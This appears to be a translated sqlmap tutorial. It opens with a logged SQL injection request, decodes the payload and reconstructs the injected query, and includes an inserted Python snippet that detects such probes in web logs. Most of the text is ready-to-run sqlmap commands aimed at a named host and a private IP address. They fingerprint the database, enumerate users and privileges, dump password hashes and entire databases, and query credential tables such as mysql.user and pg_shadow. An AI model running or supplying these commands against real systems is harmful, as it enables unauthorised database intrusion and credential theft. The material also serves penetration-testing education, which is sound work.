[hh:mm:16] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test HTTP/1.1
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: www.myhack58.com:80
Accept-language: en-us,en;q=0.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-agent: sqlmap/0.7rc1 (sqlmap.sourceforge.net)
Connection: close
[...]
[hh:mm:17] [INFO] GET parameter 'id' is custom injectable
[...]

As you can see, the injection payload for testing for custom injection is:

id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test

which URL decoded is:

id=1') AND 7433=7433 AND ('test'='test

and makes the query syntactically correct with respect to the page's query:

SELECT * FROM users WHERE id=('1') AND 7433=7433 AND ('test'='test') LIMIT 0, 1

In this simple example, sqlmap could detect and exploit the SQL injection without a custom injection payload, but in real-world applications it is sometimes necessary to provide one.
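The reconstruction above can be checked mechanically. The following Python is an added example, not code from the original page or from sqlmap: it splices the URL-decoded id value into the page's query template to show why the prefix/postfix variant stays syntactically valid while a bare payload would not, and flags that probe in constructed web-server log lines (the log layout and the sample lines are assumptions made here).

```python
import re
from urllib.parse import urlsplit, parse_qs

# Query template quoted on the page: $_GET['id'] is concatenated straight into it.
TEMPLATE = "SELECT * FROM users WHERE id=('{id}') LIMIT 0, 1"
# Indicators taken from the request shown above: a numeric tautology and sqlmap's User-Agent.
TAUTOLOGY = re.compile(r"\bAND\s+(\d+)=\1\b", re.IGNORECASE)
SQLMAP_UA = re.compile(r"\bsqlmap/", re.IGNORECASE)
# Assumed (constructed) log layout: ... "GET <path> HTTP/x.y" <status> <bytes> "<user-agent>"
LOG_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+" \d+ \d+ "([^"]*)"')

def render_query(raw_id):
    """Splice the decoded id into the template with no escaping, as the page's code does."""
    return TEMPLATE.format(id=raw_id)

def quotes_balanced(sql):
    """Crude syntax check: even count of single quotes and balanced parentheses.
    The prefix/postfix payload keeps both balanced; a bare "1' AND 1=1" does not."""
    return sql.count("'") % 2 == 0 and sql.count("(") == sql.count(")")

def analyse_request(path, user_agent):
    """Decode the id parameter of one request; return the rebuilt query and indicators."""
    params = parse_qs(urlsplit(path).query, keep_blank_values=True)
    raw_id = params.get("id", [""])[0]  # parse_qs already URL-decodes the value
    query = render_query(raw_id)
    return {
        "id": raw_id,
        "query": query,
        "balanced": quotes_balanced(query),
        "tautology": bool(TAUTOLOGY.search(raw_id)),
        "sqlmap_ua": bool(SQLMAP_UA.search(user_agent)),
    }

def scan_log(lines):
    """Return findings for every log line carrying a tautology or sqlmap User-Agent."""
    hits = []
    for line in lines:
        match = LOG_RE.search(line)
        if match:
            finding = analyse_request(match.group(1), match.group(2))
            if finding["tautology"] or finding["sqlmap_ua"]:
                hits.append(finding)
    return hits

# Constructed sample log: a benign request and the custom-injection probe from the page.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2009:10:00:00 +0000] "GET /sqlmap/mysql/get_str_brackets.php?id=1 HTTP/1.1" 200 512 "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2009:10:00:16 +0000] "GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test HTTP/1.1" 200 512 "sqlmap/0.7rc1 (sqlmap.sourceforge.net)"',
]
```

Calling scan_log(SAMPLE_LOG) returns one finding whose rebuilt query is exactly the statement shown above, with both quotes and parentheses balanced.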

Page comparison

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1" --string "luther" -v 1

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1" --regexp "lu[\w][\w]er" -v

Exclude dynamic page content from the comparison

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1" --excl-reg "Dynamic content: ([\d]+)"

Stacked-query test (PHP's built-in mysql_query() does not support multiple statements)

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int.php?id=1" --stacked-test -v 1

UNION injection test

python sqlmap.py -u "www.myhack58.com/sqlmap/oracle/get_int.php?id=1" --union-test -v 1

UNION injection using the ORDER BY technique

python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_str.php?id=1" --union-test --union-tech orderby -v 1

python sqlmap.py -u "www.myhack58.com/sqlmap/mssql/get_int.php?id=1" -v 1 --union-use --banner

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int.php?id=1" -v 5 --union-use --current-user

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int_partialunion.php?id=1" -v 1 --union-use --dbs

Fingerprint

python sqlmap.py -u "www.myhack58.com/sqlmap/mssql/get_int.php?id=1" -v 1 -f

python sqlmap.py -u "192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f -b

Check whether the current user is a DBA

python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1" --is-dba -v 1

Enumerate database users

python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1" --users -v 0

Enumerate database user passwords

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int.php?id=1" --passwords -v 0

python sqlmap.py -u "www.myhack58.com/sqlmap/mssql/get_int.php?id=1" --passwords -U sa -v 0

Show user privileges

python sqlmap.py -u "www.myhack58.com/sqlmap/oracle/get_int.php?id=1" --privileges -v 0

python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1" --privileges -U postgres -v 0

List databases

python sqlmap.py -u "www.myhack58.com/sqlmap/mssql/get_int.php?id=1" --dbs -v 0

List the columns of a given table in a given database

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int.php?id=1" --columns -T users -D test -v 1

Dump the given columns of a given table in a given database

python sqlmap.py -u "www.myhack58.com/sqlmap/mssql/get_int.php?id=1" --dump -T users -D master -C surname -v 0

Restrict the range to entries 2 to 4

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int.php?id=1" --dump -T users -D test --start 2 --stop 4 -v 0

Dump the contents of all tables in all databases

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int.php?id=1" --dump-all -v 0

Dump only user-created databases and tables, excluding system databases

python sqlmap.py -u "www.myhack58.com/sqlmap/mssql/get_int.php?id=1" --dump-all --exclude-sysdbs -v 0

SQL query

python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1" --sql-query "SELECT usename FROM pg_user" -v 0

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int.php?id=1" --sql-query "SELECT host, password FROM mysql.user LIMIT 1, 3" -v 1

SELECT usename, passwd FROM pg_shadow ORDER BY usename

Save and restore the session

python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1" -b -v 1 -s "sqlmap.log"

Save the options to an INI configuration file

python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1" -b -v 1 --save
